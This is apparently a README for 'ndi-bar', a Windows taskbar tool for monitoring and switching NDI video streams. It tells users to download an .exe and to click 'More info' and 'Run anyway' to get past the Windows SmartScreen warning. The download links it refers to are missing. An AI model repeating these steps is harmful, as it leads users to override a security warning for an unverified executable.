🖥️ ndi-bar - Manage your NDI streams with ease

Download ndi-bar

ndi-bar helps you monitor and control your NDI streams directly from your Windows taskbar. You no longer need to navigate through complex menus or switch between different windows to swap your video feeds. This tool puts your network video needs in one place.

📥 How to download

  1. Go to the official download page.
  2. Look for the latest version under the Releases section on the right side of the page.
  3. Click the file that ends with .exe to start the download.
  4. Save the file to a folder you can find, such as your Downloads folder.

⚙️ Installation steps

Windows might show a warning message when you start a new program. Follow these steps to finish the setup:

  1. Locate the file you just downloaded.
  2. Double-click the file to open the installer.
  3. If a window appears that says Windows protected your PC, click More info.
  4. Click the Run anyway button.
  5. Follow the prompts on your screen to complete the installation.
  6. The app will launch once the installation finishes. You will see an icon in your system tray at the bottom right of your screen.

🛠️ System requirements

Your computer needs to meet these basic standards to run ndi-bar smoothly:

  • Operating System: Windows 10 or Windows 11.
  • Network: A stable wired connection is better than Wi-Fi for video streaming.
  • Performance: A processor with at least 2.0 GHz speed.
  • Memory: 4 GB of RAM or more.
  • NDI Tools: You must have the NDI Tools runtime installed on your machine.

🚀 How to use ndi-bar

Once the app runs, you can start controlling your streams.

  1. Find the ndi-bar icon in your taskbar notification area. This area is near your clock in the bottom right corner of your screen.
  2. Left-click the icon to view all active NDI streams on your network.
  3. Select the stream you want to view or manage from the list.
  4. Use the controls in the small menu to stop, start, or switch between different video sources.

💡 Common features

  • Stream Discovery: The app finds all available NDI sources on your network without manual setup.
  • Taskbar Access: Keep your screen clean by hiding the app in your taskbar.
  • Quick Toggle: Switch between camera feeds and screen captures with one click.
  • Lightweight: The app uses very little memory so it stays open in the background.

❓ Frequently asked questions

Does this app work over Wi-Fi? Yes, but video streaming requires high bandwidth. You might see lag or stutters if your Wi-Fi signal is weak. Use a network cable for the best results.

Why does the icon not show up? Check your hidden icons menu in the taskbar. Click the small arrow pointing up near your clock to see if ndi-bar is hidden there.

Can I connect to multiple sources at once? Yes. Use the menu to open as many streams as your network data allows.

Is my data private? The app only communicates with NDI sources on your local network. It does not send your data to external servers.

🔧 Troubleshooting

If you do not see any streams, check these items:

  • Verify that your computer and your NDI source share the same network.
  • Ensure your firewall allows local network traffic for NDI.
  • Restart the app if it stops responding to your clicks.
  • Check that the NDI source device is on and transmitting data.

If you continue to have trouble, ensure you downloaded the latest version from the link above. We update this tool to improve how it handles network changes and to keep it running well on newer versions of Windows. Keeping the app updated prevents most connection issues.
